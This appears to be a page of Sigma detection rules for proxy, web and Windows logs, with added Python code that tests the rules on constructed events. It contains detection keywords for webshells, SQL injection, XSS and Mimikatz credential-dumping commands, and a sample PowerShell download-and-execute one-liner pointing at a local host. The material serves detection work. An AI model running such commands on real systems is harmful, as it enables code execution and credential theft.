  5. author: Markus Neis
  6. references:
  7. - https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/onedrive_getonly.profile
  8. date: 2019/11/12
  9. modified: 2022/01/07
  10. logsource:
  11. category: proxy
  12. detection:
  13. selection:
  14. cs-method: 'GET'
  15. c-uri|endswith: '?manifest=wac'
  16. cs-host: 'onedrive.live.com'
  17. filter:
  18. c-uri|startswith: 'http'
  19. c-uri|contains: '://onedrive.live.com/'
  20. condition: selection and not filter
  21. falsepositives:
  22. - Unknown
  23. level: high
  24. tags:
  25. - attack.defense_evasion
  26. - attack.command_and_control
  27. - attack.t1071.001

Windows PowerShell User Agent

  1. title: Windows PowerShell User Agent
  2. id: c8557060-9221-4448-8794-96320e6f3e74
  3. status: test
  4. description: Detects Windows PowerShell Web Access
  5. author: Florian Roth
  6. references:
  7. - https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest
  8. date: 2017/03/13
  9. modified: 2021/11/27
  10. logsource:
  11. category: proxy
  12. detection:
  13. selection:
  14. c-useragent|contains: ' WindowsPowerShell/'
  15. condition: selection
  16. fields:
  17. - ClientIP
  18. - c-uri
  19. - c-useragent
  20. falsepositives:
  21. - Administrative scripts that download files from the Internet
  22. - Administrative scripts that retrieve certain website contents
  23. level: medium
  24. tags:
  25. - attack.defense_evasion
  26. - attack.command_and_control
  27. - attack.t1071.001

web

web_apache_segfault.yml
web_apache_threading_error.yml
web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml
web_citrix_cve_2019_19781_exploit.yml
web_citrix_cve_2020_8193_8195_exploit.yml
web_cve_2010_5278_exploitation_attempt.yml
web_cve_2018_2894_weblogic_exploit.yml
web_cve_2019_3398_confluence.yml
web_cve_2020_0688_msexchange.yml
web_cve_2020_14882_weblogic_exploit.yml
web_cve_2020_3452_cisco_asa_ftd.yml
web_cve_2020_5902_f5_bigip.yml
web_cve_2021_2109_weblogic_rce_exploit.yml
web_cve_2021_21978_vmware_view_planner_exploit.yml
web_cve_2021_22005_vmware_file_upload.yml
web_cve_2021_22893_pulse_secure_rce_exploit.yml
web_cve_2021_26814_wzuh_rce.yml
web_cve_2021_26858_iis_rce.yml
web_cve_2021_33766_msexchange_proxytoken.yml
web_cve_2021_40539_adselfservice.yml
web_cve_2021_40539_manageengine_adselfservice_exploit.yml
web_cve_2021_41773_apache_path_traversal.yml
web_cve_2021_42237_sitecore_report_ashx.yml
web_cve_2021_43798_grafana.yml
web_cve_2021_44228_log4j.yml
web_cve_2021_44228_log4j_fields.yml
web_exchange_cve_2020_0688_exploit.yml
web_exchange_exploitation_hafnium.yml
web_exchange_proxyshell.yml
web_exchange_proxyshell_successful.yml
web_expl_exchange_cve_2021_28480.yml
web_fortinet_cve_2018_13379_preauth_read_exploit.yml
web_fortinet_cve_2021_22123_exploit.yml
web_iis_tilt_shortname_scan.yml
web_jndi_exploit.yml
web_multiple_suspicious_resp_codes_single_source.yml
web_nginx_core_dump.yml
web_path_traversal_exploitation_attempt.yml
web_pulsesecure_cve_2019_11510.yml
web_solarwinds_cve_2020_10148.yml
web_solarwinds_supernova_webshell.yml
web_sonicwall_jarrewrite_exploit.yml
web_source_code_enumeration.yml
web_terramaster_cve_2020_28188_rce_exploit.yml
web_unc2546_dewmode_php_webshell.yml
web_vsphere_cve_2021_21972_unauth_rce_exploit.yml
win_powershell_snapins_hafnium.yml
win_webshell_regeorg.yml

KeyWords

Detect Sql Injection By Keywords

  1. title: Detect Sql Injection By Keywords
  2. id: 5513deaf-f49a-46c2-a6c8-3f111b5cb453
  3. status: test
  4. description: Detects SQL injection attempts that use GET requests, by keyword searches in URL strings
  5. author: Saw Win Naung
  6. date: 2020/02/22
  7. modified: 2021/11/27
  8. logsource:
  9. category: webserver
  10. detection:
  11. keywords:
  12. - '=select'
  13. - '=union'
  14. - '=concat'
  15. condition: keywords
  16. fields:
  17. - client_ip
  18. - vhost
  19. - url
  20. - response
  21. falsepositives:
  22. - Java scripts and CSS Files
  23. - User searches in search boxes of the respective website
  24. level: high

Webshell Detection by Keyword

  1. title: Webshell Detection by Keyword
  2. id: 7ff9db12-1b94-4a79-ba68-a2402c5d6729
  3. status: test
  4. description: Detects webshells that use GET requests by keyword searches in URL strings
  5. author: Florian Roth
  6. date: 2017/02/19
  7. modified: 2021/11/27
  8. logsource:
  9. category: webserver
  10. detection:
  11. keywords:
  12. - =whoami
  13. - =net%20user
  14. - =cmd%20/c%20
  15. condition: keywords
  16. fields:
  17. - client_ip
  18. - vhost
  19. - url
  20. - response
  21. falsepositives:
  22. - Web sites like wikis with articles on OS commands, and pages that include the OS commands in the URLs
  23. - User searches in search boxes of the respective website
  24. level: high
  25. tags:
  26. - attack.persistence
  27. - attack.t1505.003

Detect XSS Attempts By Keywords

  1. title: Detect XSS Attempts By Keywords
  2. id: 65354b83-a2ea-4ea6-8414-3ab38be0d409
  3. status: experimental
  4. description: Detects XSS attempts that use GET requests, by keyword searches in URL strings
  5. author: Saw Win Naung
  6. date: 2021/08/15
  7. logsource:
  8. category: webserver
  9. detection:
  10. keywords:
  11. - '=cookie'
  12. - '=script'
  13. - '=onload'
  14. - '=onmouseover'
  15. condition: keywords
  16. fields:
  17. - client_ip
  18. - vhost
  19. - url
  20. - response
  21. falsepositives:
  22. - Java scripts, CSS files and PNG files
  23. - User searches in search boxes of the respective website
  24. level: high

windows

builtin

application

applocker

bits_client

code_integrity

dns_server

driverframeworks

firewall_as

ldap

msexchange

ntlm

printservice

security

servicebus

smbclient

system

win_hack_smbexec.yml
win_invoke_obfuscation_clip_services.yml
win_invoke_obfuscation_obfuscated_iex_services.yml
win_invoke_obfuscation_stdin_services.yml
win_invoke_obfuscation_var_services.yml
win_invoke_obfuscation_via_compress_services.yml
win_invoke_obfuscation_via_rundll_services.yml
win_invoke_obfuscation_via_stdin_services.yml
win_invoke_obfuscation_via_use_clip_services.yml
win_invoke_obfuscation_via_use_mshta_services.yml
win_invoke_obfuscation_via_use_rundll32_services.yml
win_invoke_obfuscation_via_var_services.yml
win_mal_creddumper.yml
win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml
win_ntfs_vuln_exploit.yml
win_pcap_drivers.yml
win_possible_zerologon_exploitation_using_wellknown_tools.yml
win_powershell_script_installed_as_service.yml
win_quarkspwdump_clearing_hive_access_history.yml
win_rare_service_installs.yml
win_rdp_potential_cve_2019_0708.yml
win_susp_dhcp_config.yml
win_susp_dhcp_config_failed.yml
win_susp_proceshacker.yml
win_susp_sam_dump.yml
win_susp_system_update_error.yml
win_system_defender_disabled.yml
win_system_susp_eventlog_cleared.yml
win_tap_driver_installation.yml
win_tool_psexec.yml
win_volume_shadow_copy_mount.yml
win_vul_cve_2020_1472.yml
win_vul_cve_2021_42278_or_cve_2021_42287.yml

APT

Turla Service Install

title: Turla Service Install
id: 1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4
status: test
description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET
author: Florian Roth
references:
    - https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/
date: 2017/03/31
modified: 2021/11/30
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
        ServiceName:
            - 'srservice'
            - 'ipvpn'
            - 'hkmsvc'
    condition: selection
falsepositives:
    - Unknown
level: high
tags:
    - attack.persistence
    - attack.g0010
    - attack.t1543.003

Chafer Activity
title: Chafer Activity
id: 53ba33fd-3a50-4468-a5ef-c583635cfa92
description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018
status: experimental
references:
    - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/
tags:
    - attack.persistence
    - attack.g0049
    - attack.t1053.005
    - attack.s0111
    - attack.t1543.003
    - attack.defense_evasion
    - attack.t1112
    - attack.command_and_control
    - attack.t1071.004
date: 2018/03/23
modified: 2021/11/30
author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
logsource:
    product: windows
    service: system
detection:
    selection_service:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
        ServiceName:
            - 'SC Scheduled Scan'
            - 'UpdatMachine'
    condition: selection_service
falsepositives:
    - Unknown
level: critical

StoneDrill Service Install
title: StoneDrill Service Install
id: 9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6
status: test
description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky
author: Florian Roth
references:
    - https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/
date: 2017/03/07
modified: 2021/11/30
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
        ServiceName: NtsSrv
        ServiceFileName|endswith: ' LocalService'
    condition: selection
falsepositives:
    - Unlikely
level: high
tags:
    - attack.persistence
    - attack.g0064
    - attack.t1543.003

Turla PNG Dropper Service
title: Turla PNG Dropper Service
id: 1228f8e2-7e79-4dea-b0ad-c91f1d5016c1
status: test
description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
author: Florian Roth
references:
    - https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/
date: 2018/11/23
modified: 2021/11/30
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
        ServiceName: 'WerFaultSvc'
    condition: selection
falsepositives:
    - unlikely
level: critical
tags:
    - attack.persistence
    - attack.g0010
    - attack.t1543.003

CobaltStrike Service Installations
title: CobaltStrike Service Installations
id: 5a105d34-05fc-401e-8553-272b45c1522d
description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement
status: experimental
author: Florian Roth, Wojciech Lesicki
references:
    - https://www.sans.org/webcasts/119395
    - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/
    - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
date: 2021/05/26
modified: 2021/09/30
tags:
    - attack.execution
    - attack.privilege_escalation
    - attack.lateral_movement
    - attack.t1021.002
    - attack.t1543.003
    - attack.t1569.002
logsource:
    product: windows
    service: system
detection:
    selection_id:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
    selection1:
        ImagePath|contains|all:
            - 'ADMIN$'
            - '.exe'
    selection2:
        ImagePath|contains|all:
            - '%COMSPEC%'
            - 'start'
            - 'powershell'
    selection3:
        ImagePath|contains: 'powershell -nop -w hidden -encodedcommand'
    selection4:
        ImagePath|base64offset|contains: "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:"
    condition: selection_id and (selection1 or selection2 or selection3 or selection4)
falsepositives:
    - Unknown
level: critical
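The following Python is an added illustration, not code from the Sigma project or from the rule above: it evaluates the rule's condition over constructed EventID 7045 records and makes visible what the `base64offset` modifier in selection4 expands to (the three base64 encodings a string can have depending on its byte alignment, with the alignment-dependent edge characters stripped). It also adds one check the rule as written does not have: PowerShell's `-EncodedCommand` takes base64 of the UTF-16LE command, so the plain `base64offset` expansion only matches an ASCII-encoded payload, while the `selection4_wide` variant (the equivalent of `|wide|base64offset|contains`) matches the real encoding. The service names, the `%COMSPEC%` prefix and the one-liner are sample values I constructed for the example.

```python
import base64
from typing import Dict, List

# Sigma's base64offset expansion (as implemented in pySigma): the three base64
# encodings a byte string can have depending on its alignment in the encoded
# buffer, with the alignment-dependent leading/trailing characters stripped.
START = (0, 2, 3)
END = (None, -3, -2)


def base64offset(value: bytes) -> List[str]:
    out = []
    for i in range(3):
        enc = base64.b64encode(b" " * i + value).decode()
        out.append(enc[START[i]:END[(len(value) + i) % 3]])
    return out


SELECTION4 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:"


def matches(event: Dict) -> List[str]:
    """Evaluate the rule's condition on one System-log event.

    Returns the names of the sub-selections that fired (empty list = no alert).
    Plain strings are compared case-insensitively, as Sigma does by default.
    """
    if (event.get("Provider_Name") != "Service Control Manager"
            or event.get("EventID") != 7045):
        return []                       # selection_id did not match
    path = str(event.get("ImagePath", "")).lower()
    fired = []
    if "admin$" in path and ".exe" in path:
        fired.append("selection1")
    if all(s in path for s in ("%comspec%", "start", "powershell")):
        fired.append("selection2")
    if "powershell -nop -w hidden -encodedcommand" in path:
        fired.append("selection3")
    # selection4 as written in the rule: base64offset of the ASCII string
    if any(b.lower() in path for b in base64offset(SELECTION4.encode("ascii"))):
        fired.append("selection4")
    # Added check, not in the rule: -EncodedCommand carries base64 of the
    # UTF-16LE command, i.e. what |wide|base64offset|contains would match.
    if any(b.lower() in path for b in base64offset(SELECTION4.encode("utf-16le"))):
        fired.append("selection4_wide")
    return fired


def service_event(service: str, image_path: str) -> Dict:
    return {"Provider_Name": "Service Control Manager", "EventID": 7045,
            "ServiceName": service, "ImagePath": image_path}


# Constructed sample events (not real telemetry). The one-liner and the
# %COMSPEC% prefix follow the shape described in the rule's references.
CMD = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:4444/')"
PSH = "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand "
EVENTS = {
    "psexec_admin_share": service_event("a1b2c3d", r"\\127.0.0.1\ADMIN$\a1b2c3d.exe"),
    "psh_ascii_b64": service_event(
        "e4f5a6b", PSH + base64.b64encode(CMD.encode("ascii")).decode()),
    "psh_utf16le_b64": service_event(
        "c7d8e9f", PSH + base64.b64encode(CMD.encode("utf-16le")).decode()),
    "benign_installer": service_event("VendorAgent", r"C:\Program Files\Vendor\agent.exe"),
}

if __name__ == "__main__":
    for name, ev in EVENTS.items():
        print(f"{name:20s} -> {matches(ev) or 'no match'}")
```

Running it shows the ASCII-encoded sample hitting selection2, selection3 and selection4, while the UTF-16LE sample (the form PowerShell actually decodes) hits selection2 and selection3 but only the added wide variant of selection4; selection2 and selection3 therefore carry the detection for real `-encodedcommand` payloads.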

Moriya Rootkit
title: Moriya Rootkit
id: 25b9c01c-350d-4b95-bed1-836d04a4f324
description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
status: experimental
author: Bhabesh Raj
date: 2021/05/06
modified: 2021/11/30
references:
    - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
tags:
    - attack.persistence
    - attack.privilege_escalation
    - attack.t1543.003
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
        ServiceName: ZzNetSvc
    condition: selection
level: critical
falsepositives:
    - None

taskscheduler

Rare Scheduled Task Creations
title: Rare Scheduled Task Creations
id: b20f6158-9438-41be-83da-a5a16ac90c2b
status: test
description: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.
author: Florian Roth
date: 2017/03/17
modified: 2021/12/28
logsource:
    product: windows
    service: taskscheduler
detection:
    selection:
        EventID: 106
    filter1:
        TaskName:
            - \Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan
    timeframe: 7d
    condition: selection and not 1 of filter* | count() by TaskName < 5
falsepositives:
    - Software installation
level: low
tags:
    - attack.persistence
    - attack.s0111
    - attack.t1053.005
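The `count() by TaskName < 5` aggregation with a `timeframe` is the part of this rule that backends implement very differently, so here is an added Python model of it (mine, not the Sigma project's): EventID 106 records are filtered, bucketed into tumbling 7-day windows starting at the earliest selected event, and a task name is reported for a window in which it was registered fewer than five times. The host names, task names and timestamps are constructed sample data.

```python
from collections import Counter
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

TIMEFRAME = timedelta(days=7)          # timeframe: 7d
THRESHOLD = 5                          # count() by TaskName < 5
FILTERED_TASKS = {                     # filter1
    r"\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan",
}


def rare_task_creations(events: List[Dict], threshold: int = THRESHOLD,
                        timeframe: timedelta = TIMEFRAME) -> Dict[Tuple[int, str], int]:
    """Model of `selection and not 1 of filter* | count() by TaskName < 5`.

    Selected events are binned into tumbling windows of `timeframe` starting
    at the earliest selected event (the way a SIEM bins time). Returns
    {(window_index, TaskName): count} for names registered fewer than
    `threshold` times inside a window.
    """
    selected = [e for e in events
                if e.get("EventID") == 106 and e.get("TaskName") not in FILTERED_TASKS]
    if not selected:
        return {}
    t0 = min(datetime.fromisoformat(e["time"]) for e in selected)
    counts: Counter = Counter()
    for e in selected:
        window = (datetime.fromisoformat(e["time"]) - t0) // timeframe
        counts[(window, e["TaskName"])] += 1
    return {key: n for key, n in counts.items() if n < threshold}


def task_event(time: str, computer: str, task: str, event_id: int = 106) -> Dict:
    return {"time": time, "EventID": event_id, "Computer": computer, "TaskName": task}


# Constructed Task Scheduler operational-log records (not real telemetry).
EVENTS = (
    # a software rollout registers the same task on eight hosts: common, not rare
    [task_event(f"2022-01-03T09:{m:02d}:00", f"ws{n:02d}", r"\VendorUpdater")
     for n, m in zip(range(1, 9), range(0, 40, 5))]
    + [
        # excluded by filter1
        task_event("2022-01-04T02:13:00", "ws03",
                   r"\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan"),
        # one-off task with a suspicious name on a single host: rare
        task_event("2022-01-05T23:41:00", "ws07", r"\Users\Public\svchost"),
        # a second one-off, nine days later, so it lands in the next 7-day window
        task_event("2022-01-12T10:00:00", "ws01", r"\OnboardingHelper"),
        # not EventID 106 (task registered), so never selected
        task_event("2022-01-03T12:00:00", "ws02", r"\Anything", event_id=140),
    ]
)

if __name__ == "__main__":
    for (window, task), n in sorted(rare_task_creations(EVENTS).items()):
        print(f"window {window}: {task!r} registered {n}x")
```

The threshold is relative to fleet size: on a few hosts every legitimate task is "rare", which is why the rule sits at `level: low` and lists software installation as its expected false positive.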

windefend

wmi

Mimikatz Use

title: Mimikatz Use
id: 06d71506-7beb-4f22-8888-e2e5e2ca7fd8
description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz versions that are however still used by different threat groups)
status: experimental
author: Florian Roth (rule), David ANDRE (additional keywords)
date: 2017/01/10
modified: 2022/01/05
references:
    - https://tools.thehacker.recipes/mimikatz/modules
tags:
    - attack.s0002
    - attack.lateral_movement
    - attack.credential_access
    - car.2013-07-001
    - car.2019-04-004
    - attack.t1003.002
    - attack.t1003.004
    - attack.t1003.001
    - attack.t1003.006
logsource:
    product: windows
detection:
    keywords:
        - 'dpapi::masterkey'
        - 'eo.oe.kiwi'
        - 'event::clear'
        - 'event::drop'
        - 'gentilkiwi.com'
        - 'kerberos::golden'
        - 'kerberos::ptc'
        - 'kerberos::ptt'
        - 'kerberos::tgt'
        - 'Kiwi Legit Printer'
        - 'lsadump::'
        - 'mimidrv.sys'
        - '\mimilib.dll'
        - 'misc::printnightmare'
        - 'misc::shadowcopies'
        - 'misc::skeleton'
        - 'privilege::backup'
        - 'privilege::debug'
        - 'privilege::driver'
        - 'sekurlsa::'
    filter:
        EventID: 15 # Sysmon's FileStream Events (could cause false positives when Sigma rules get copied on/to a system)
    condition: keywords and not filter
falsepositives:
    - Naughty administrators
    - Penetration test
    - AV Signature updates
    - Files with Mimikatz in their filename
level: critical

create_remote_thread

CobaltStrike Process Injection

title: CobaltStrike Process Injection
id: 6309645e-122d-4c5b-bb2b-22e4f9c2fa42
description: Detects a possible remote thread creation with certain characteristics which are typical for Cobalt Strike beacons
references:
    - https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f
    - https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/
tags:
    - attack.defense_evasion
    - attack.t1055.001
status: experimental
author: Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community
date: 2018/11/30
modified: 2021/11/20
logsource:
    product: windows
    category: create_remote_thread
detection:
    selection:
        StartAddress|endswith:
            - '0B80'
            - '0C7C'
            - '0C88'
    condition: selection
falsepositives:
    - unknown
level: high

CreateRemoteThread API and LoadLibrary

title: CreateRemoteThread API and LoadLibrary
id: 052ec6f6-1adc-41e6-907a-f1c813478bee
status: test
description: Detects potential use of the CreateRemoteThread API and the LoadLibrary function to inject a DLL into a process
author: Roberto Rodriguez @Cyb3rWard0g
references:
    - https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-180719170510.html
date: 2019/08/11
modified: 2021/11/27
logsource:
    product: windows
    category: create_remote_thread
detection:
    selection:
        StartModule|endswith: '\kernel32.dll'
        StartFunction: 'LoadLibraryA'
    condition: selection
falsepositives:
    - Unknown
level: critical
tags:
    - attack.defense_evasion
    - attack.t1055.001

Accessing WinAPI in PowerShell. Code Injection.

title: Accessing WinAPI in PowerShell. Code Injection.
id: eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50
status: test
description: Detects code injection by PowerShell into another process
author: Nikita Nazarov, oscd.community
references:
    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
date: 2020/10/06
modified: 2021/11/27
logsource:
    product: windows
    category: create_remote_thread
    definition: 'Note that you have to configure logging for CreateRemoteThread in the Sysmon config'
detection:
    selection:
        SourceImage|endswith: '\powershell.exe'
    condition: selection
falsepositives:
    - Unknown
level: high
tags:
    - attack.execution
    - attack.t1059.001

PowerShell Rundll32 Remote Thread Creation

title: PowerShell Rundll32 Remote Thread Creation
id: 99b97608-3e21-4bfe-8217-2a127c396a0e
status: experimental
description: Detects PowerShell remote thread creation in Rundll32.exe
author: Florian Roth
references:
    - https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html
date: 2018/06/25
modified: 2021/11/12
logsource:
    product: windows
    category: create_remote_thread
detection:
    selection:
        SourceImage|endswith: '\powershell.exe'
        TargetImage|endswith: '\rundll32.exe'
    condition: selection
tags:
    - attack.defense_evasion
    - attack.execution
    - attack.t1218.011
    - attack.t1059.001
falsepositives:
    - Unknown
level: high

Suspicious Remote Thread Created

title: Suspicious Remote Thread Created
id: 66d31e5f-52d6-40a4-9615-002d3789a119
description: Offensive tradecraft is switching away from using APIs like "CreateRemoteThread", however, this is still largely observed in the wild. This rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes. It is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.
notes:
    - MonitoringHost.exe is a process that loads .NET CLR by default and thus a favorite for process injection for .NET in-memory offensive tools.
status: experimental
date: 2019/10/27
modified: 2021/06/27
author: Perez Diego (@darkquassar), oscd.community
references:
    - Personal research, statistical analysis
    - https://lolbas-project.github.io
logsource:
    product: windows
    category: create_remote_thread
tags:
    - attack.privilege_escalation
    - attack.defense_evasion
    - attack.t1055
detection:
    selection:
        SourceImage|endswith:
            - '\bash.exe'
            - '\cvtres.exe'
            - '\defrag.exe'
            - '\dnx.exe'
            - '\esentutl.exe'
            - '\excel.exe'
            - '\expand.exe'
            - '\explorer.exe'
            - '\find.exe'
            - '\findstr.exe'
            - '\forfiles.exe'
            - '\git.exe'
            - '\gpupdate.exe'
            - '\hh.exe'
            - '\iexplore.exe'
            - '\installutil.exe'
            - '\lync.exe'
            - '\makecab.exe'
            - '\mDNSResponder.exe'
            - '\monitoringhost.exe'
            - '\msbuild.exe'
            - '\mshta.exe'
            - '\msiexec.exe'
            - '\mspaint.exe'
            - '\outlook.exe'
            - '\ping.exe'
            - '\powerpnt.exe'
            - '\powershell.exe'
            - '\provtool.exe'
            - '\python.exe'
            - '\regsvr32.exe'
            - '\robocopy.exe'
            - '\runonce.exe'
            - '\sapcimc.exe'
            - '\schtasks.exe'
            - '\smartscreen.exe'
            - '\spoolsv.exe'
            # - '\taskhost.exe' # disabled due to false positives
            - '\tstheme.exe'
            - '\userinit.exe'
            - '\vssadmin.exe'
            - '\vssvc.exe'
            - '\w3wp.exe'
            - '\winlogon.exe'
            - '\winscp.exe'
            - '\wmic.exe'
            - '\word.exe'
            - '\wscript.exe'
    filter:
        SourceImage|contains: 'Visual Studio'
    condition: selection and not filter
fields:
    - ComputerName
    - User
    - SourceImage
    - TargetImage
level: high
falsepositives:
    - Unknown

Password Dumper Remote Thread in LSASS

title: Password Dumper Remote Thread in LSASS
id: f239b326-2f41-4d6b-9dfa-c846a60ef505
description: Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.
references:
    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm
status: stable
author: Thomas Patzke
date: 2017/02/19
modified: 2021/06/21
logsource:
    product: windows
    category: create_remote_thread
detection:
    selection:
        TargetImage|endswith: '\lsass.exe'
        StartModule: ''
    condition: selection
tags:
    - attack.credential_access
    - attack.s0005
    - attack.t1003.001
falsepositives:
    - Antivirus products
level: high

CACTUSTORCH Remote Thread Creation

title: CACTUSTORCH Remote Thread Creation
id: 2e4e488a-6164-4811-9ea1-f960c7359c40
description: Detects remote thread creation from CACTUSTORCH as described in references.
references:
    - https://twitter.com/SBousseaden/status/1090588499517079552
    - https://github.com/mdsecactivebreach/CACTUSTORCH
status: experimental
author: '@SBousseaden (detection), Thomas Patzke (rule)'
date: 2019/02/01
modified: 2021/11/12
logsource:
    product: windows
    category: create_remote_thread
detection:
    selection:
        SourceImage|endswith:
            - '\System32\cscript.exe'
            - '\System32\wscript.exe'
            - '\System32\mshta.exe'
            - '\winword.exe'
            - '\excel.exe'
        TargetImage|contains: '\SysWOW64\'
        StartModule: null
    condition: selection
tags:
    - attack.defense_evasion
    - attack.t1055.012
    - attack.execution
    - attack.t1059.005
    - attack.t1059.007
    - attack.t1218.005
falsepositives:
    - unknown
level: high
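Two of the create_remote_thread rules above look alike but test different things: "Password Dumper Remote Thread in LSASS" uses `StartModule: ''`, which in Sigma means the field is present and empty, while "CACTUSTORCH Remote Thread Creation" uses `StartModule: null`, which means the field is absent from the event. The following Python is an added example (mine, not the Sigma project's) that evaluates those two rules and "CobaltStrike Process Injection" with exactly those semantics over constructed Sysmon EventID 8 records, including one where the collector stored a placeholder for an unresolved module, which matches neither form. All image paths, addresses and the placeholder convention are constructed for the example; check what your own pipeline writes for an unresolved StartModule before relying on either rule.

```python
from typing import Callable, Dict, List, Optional, Sequence


def field_equals(event: Dict, field: str, expected: Optional[str]) -> bool:
    """Sigma value semantics the rules above rely on:
       None (YAML null)  -> the field must be absent from the event
       ''                -> the field must be present and empty
       other string      -> case-insensitive equality
    """
    if expected is None:
        return field not in event
    if field not in event:
        return False
    if expected == "":
        return event[field] == ""
    return str(event[field]).lower() == expected.lower()


def endswith_any(value: Optional[str], suffixes: Sequence[str]) -> bool:
    return value is not None and any(value.lower().endswith(s.lower()) for s in suffixes)


def password_dumper_lsass(e: Dict) -> bool:
    # TargetImage|endswith '\lsass.exe' and StartModule: ''
    return endswith_any(e.get("TargetImage"), [r"\lsass.exe"]) and field_equals(e, "StartModule", "")


def cactustorch(e: Dict) -> bool:
    # script/Office host -> target under SysWOW64, StartModule: null
    hosts = [r"\System32\cscript.exe", r"\System32\wscript.exe", r"\System32\mshta.exe",
             r"\winword.exe", r"\excel.exe"]
    return (endswith_any(e.get("SourceImage"), hosts)
            and "\\syswow64\\" in str(e.get("TargetImage", "")).lower()
            and field_equals(e, "StartModule", None))


def cobaltstrike_injection(e: Dict) -> bool:
    # StartAddress|endswith one of the three low-address patterns from the rule
    return endswith_any(e.get("StartAddress"), ["0B80", "0C7C", "0C88"])


RULES: Dict[str, Callable[[Dict], bool]] = {
    "Password Dumper Remote Thread in LSASS": password_dumper_lsass,
    "CACTUSTORCH Remote Thread Creation": cactustorch,
    "CobaltStrike Process Injection": cobaltstrike_injection,
}


def evaluate(event: Dict) -> List[str]:
    """Names of the rules that fire on one EventID 8 record."""
    return [name for name, rule in RULES.items() if rule(event)]


# Constructed Sysmon EventID 8 records (not real telemetry), written the way a
# collector might store them; note which ones carry a StartModule key at all.
EVENTS = {
    "dumper_into_lsass": {
        "SourceImage": r"C:\Users\bob\Desktop\dump.exe",
        "TargetImage": r"C:\Windows\System32\lsass.exe",
        "StartModule": "", "StartFunction": "",
        "StartAddress": "0x000001F2C3E40000",
    },
    "wscript_into_wow64": {
        "SourceImage": r"C:\Windows\System32\wscript.exe",
        "TargetImage": r"C:\Windows\SysWOW64\notepad.exe",
        # no StartModule key: the collector dropped the unresolved field
        "StartAddress": "0x00870000",
    },
    "rundll32_beacon_style": {
        "SourceImage": r"C:\Windows\System32\rundll32.exe",
        "TargetImage": r"C:\Windows\System32\svchost.exe",
        "StartAddress": "0x0000000001AE0B80",
    },
    "lsass_with_placeholder": {
        # same as the first, but the pipeline stored "-" for an unresolved module
        "SourceImage": r"C:\Users\bob\Desktop\dump.exe",
        "TargetImage": r"C:\Windows\System32\lsass.exe",
        "StartModule": "-",
        "StartAddress": "0x000001F2C3E40000",
    },
    "debugger_resolved_module": {
        "SourceImage": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
        "TargetImage": r"C:\Program Files\Vendor\agent.exe",
        "StartModule": r"C:\Windows\System32\ntdll.dll",
        "StartFunction": "RtlUserThreadStart",
        "StartAddress": "0x00007FFC1E4A4F20",
    },
}

if __name__ == "__main__":
    for name, ev in EVENTS.items():
        print(f"{name:26s} -> {evaluate(ev) or 'no match'}")
```

The `lsass_with_placeholder` record is the case to test for in your own SIEM: if unresolved modules arrive as a placeholder string rather than as an empty or missing field, the LSASS rule silently never fires.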

create_stream_hash

sysmon_ads_executable.yml
sysmon_regedit_export_to_ads.yml

deprecated

powershell_suspicious_download.yml
powershell_suspicious_invocation_generic.yml
powershell_suspicious_invocation_specific.yml
powershell_syncappvpublishingserver_exe.yml
process_creation_syncappvpublishingserver_exe.yml
sysmon_mimikatz_detection_lsass.yml
sysmon_rclone_execution.yml
win_susp_esentutl_activity.yml
win_susp_rclone_exec.yml
win_susp_vssadmin_ntds_activity.yml

dns_query

